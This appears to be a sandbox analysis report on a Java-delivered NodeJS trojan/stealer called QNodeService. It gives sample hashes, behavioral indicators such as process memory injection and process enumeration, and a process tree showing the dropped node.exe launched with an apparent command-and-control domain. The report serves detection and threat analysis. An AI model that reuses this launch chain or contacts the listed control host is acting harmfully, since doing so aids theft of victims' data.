qnodeservice | 56edddf836cee8d0e21c98f7251b2a9783f57682b6244e22a5aaa1d7b8a0f1dc

Analysis

Target

PROPERTY DESIGNS.jar
Size

197KB
MD5

deed634f66cb020d6a0d2ea22d7a511d
SHA1

14b63554fdc369052ada92ec9d7950b3861cd68e
SHA256

56edddf836cee8d0e21c98f7251b2a9783f57682b6244e22a5aaa1d7b8a0f1dc
SHA512

30dc4acfb0539501cc0e04d3e2baa521623998d1607ca51d5bb4fff3b06c1aa904ecda3febf867892b74e1312846b5a5a30cb7b4a30f8cd7910e2aa43facd227

Score

10^/10

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice

Executes dropped EXE 1 IoCs

pid	Process
592	node.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ad53-169.dat	js

Suspicious behavior: EnumeratesProcesses 4 IoCs

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 576 wrote to memory of 184	576	java.exe	74
PID 576 wrote to memory of 184	576	java.exe	74
PID 184 wrote to memory of 592	184	javaw.exe	78
PID 184 wrote to memory of 592	184	javaw.exe	78

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\PROPERTY DESIGNS.jar"
1⤵
- Suspicious use of WriteProcessMemory
PID:576
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\cc2417f2.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:184
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain localhost --hub-domain wgloomlozs.hopto.org
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:592

memory/592-171-0x0000003471600000-0x0000003471601000-memory.dmp

Filesize
4KB

Download